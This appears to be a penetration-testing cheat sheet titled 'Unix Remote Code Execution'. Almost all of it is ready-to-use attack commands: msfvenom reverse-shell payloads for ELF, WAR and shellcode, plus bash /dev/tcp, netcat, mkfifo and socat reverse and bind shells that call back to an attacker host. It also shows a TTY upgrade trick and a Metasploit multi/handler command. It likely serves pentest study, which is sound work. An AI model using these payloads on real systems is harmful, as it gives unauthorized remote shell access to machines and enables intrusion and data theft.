Skip to content

Unix Remote Code Execution

msfvenom

Shell File

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

Java Code

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

Shell Code

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=443 EXITFUNC=thread  -f c –e x86/shikata_ga_nai -b "<badchars>"

Encoders

msfvenom  --list encoders

Bash Reverse Shell

Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash

/bin/sh -c 'sh -i >& /dev/tcp/myip/443 0>&1'
/bin/sh -c '0<&60-;exec 60<>/dev/tcp/myip/443;sh <&60 >&60 2>&60'

Netcat Reverse Shell

Kali machine

sudo nc -nlvp 443

Unix machine

nc -nv 192.168.11.130 443 -e /bin/sh

Netcat OpenBsd

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc myip 443 >/tmp/f

Netcat BusyBox

rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc myip 443 >/tmp/f

Socat Reverse Shell

Kali machine

socat -d -d TCP4-LISTEN:443 STDOUT

Unix machine

socat TCP4:192.168.11.130:443 EXEC:/bin/sh

Socat Encrypted Bind Shell

Create credential

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 999 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem

Unix machine

socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/sh

Kali machine

sudo socat OPENSSL:192.168.11.130:443,verify=0

Nmap NSE Scripts Exploit

cd /usr/share/nmap/scripts
grep Exploits *.nse
nmap --script-help=clamav-exec.nse

Upgrade shell

/usr/bin/python -c "import pty; pty.spawn('/bin/bash')"
export TERM=xterm

^Z

stty raw -echo; fg
stty -a
stty rows 41 columns 172

msfconsole multi handler

sudo msfconsole -x "use exploit/multi/handler; set RHOST ip; set PAYLOAD windows/shell_reverse_tcp; set LHOST tun0; exploit"
processing AutoRunScript 'post/windows/manage/migrate'

PayloadsAllTheThings

Exploit Resources

SearchSploit

Metasploit Framework

BeEF